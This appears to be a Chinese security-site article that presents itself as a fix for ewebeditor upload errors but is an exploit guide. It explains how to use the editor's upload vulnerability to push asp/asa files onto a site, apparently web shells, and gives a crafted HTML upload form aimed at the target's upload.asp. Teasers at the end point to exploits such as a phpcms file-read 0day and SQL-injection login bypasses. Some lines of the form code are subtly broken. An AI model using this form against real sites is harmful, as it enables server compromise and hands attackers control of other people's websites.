网站优化

首页 > 新闻资讯 > 网站优化 > ewebeditor编辑器上传错误的问题解决

ewebeditor编辑器上传错误的问题解决

2019-09-12 热度:254 ℃
有时候进了ewebeditor编辑器后台,上传类型修改后可以上传asp和asa等等。
 
可是由于一些原因.却上传不了或上传后提示找不到文件,或者无法显示等等。
 
用法:在地址上填编辑器上传漏洞地址,样式名上填编辑器的样式名,然后上传你所要上传的文件就行了。
 
然后,在源文件找地址。

<script language=javascript>parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!');history.back()</script>  
<HTML>  
<HEAD>  
<TITLE>文件上传</TITLE>  
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">  
<style type="text/css">   
body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}  
body {padding:0px;margin:0px}  
</style>  
<script language="JavaScript" src="dialog/dialog.js"></script>  
</head>  
<body bgcolor=menu>  
<form action=" www.2cto.com /path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">  
<input type=file name=uploadfile size=1 style="width:100%">  
<input type=submit value="上传了"></input>  
<script language=javascript>  
var sAllowExt = "";  
// 检测上传表单  
function CheckUploadForm() {  
if (!IsExt(document.myform.uploadfile.value,sAllowExt)){  
   parent.UploadError("提示:\n\n请选择一个有效的文件,\n支持的格式有("+sAllowExt+")!");  
   return false;  
}  
return true  
}   
// 提交事件加入检测表单  
var oForm = document.myform ;  
oForm.attachEvent("onsubmit", CheckUploadForm) ;  
if (! oForm.submitUpload) oForm.submitUpload = new Array() ;  
oForm.submitUpload[oForm.submitUpload.length] = CheckUploadForm ;  
if (! oForm.originalSubmit) {  
oFormoForm.originalSubmit = oForm.submit ;  
oForm.submit = function() {  
   if (this.submitUpload) {  
    for (var i = 0 ; i < this.submitUpload.length ; i++) {  
     this.submitUpload() ;  
    }  
   }  
   this.originalSubmit() ;  
}  
}  
// 上传表单已装入完成  
try {  
parent.UploadLoaded();  
}  
catch(e){  
}  
</script>  
</body>  
</html> 

相关文章

phpcms后台普通用户读文件0day及修复

phpcms后台普通用户读文件0day及修复

后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?> 然后用下面的代码就可以读取到php的源了。 index.php?clientid=...

分析利用sqlmap和burpsuite绕过csrf token进行SQL注入原理

分析利用sqlmap和burpsuite绕过csrf token进行SQL注入原理

最新发现:由于测试语句所用的token是有效期的,因此每一次重新测试时需要重新提交新的csrf token,在Macro Editor窗口中点击下“Test Macro&rd...

ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析

ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析

原理 这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。 ElasticSearch用的脚本引擎是MV...

如何禁用一些php危险函数

如何禁用一些php危险函数

 phpinfo()  功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。  危险等级:中  passthru()&n...

万能密码漏洞登录后台修复方案

万能密码漏洞登录后台修复方案

万能密码这是个比较老的漏洞了,如果你的网站存在这个漏洞,结果肯定非常的悲剧。任何一个初学黑客技术的新人都能很轻松的入侵掉你的网站。因为需要入侵存在这种漏洞的网站不存在任何的技术含量,简单...

分析LimeSurvey 1.92+ build120620多重缺陷及修复

分析LimeSurvey 1.92+ build120620多重缺陷及修复

发现者 dun \ posdub[at]gmail.com     [ LimeSurvey 1.92+ build 120620 ]  Multipl...

Web应用手工渗透测试 用SQLMap进行SQL盲注测试

Web应用手工渗透测试 用SQLMap进行SQL盲注测试

简介 本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffix ...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!